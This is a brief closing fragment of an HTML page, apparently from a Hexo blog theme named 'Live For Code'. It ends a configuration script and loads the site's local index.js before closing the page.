            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>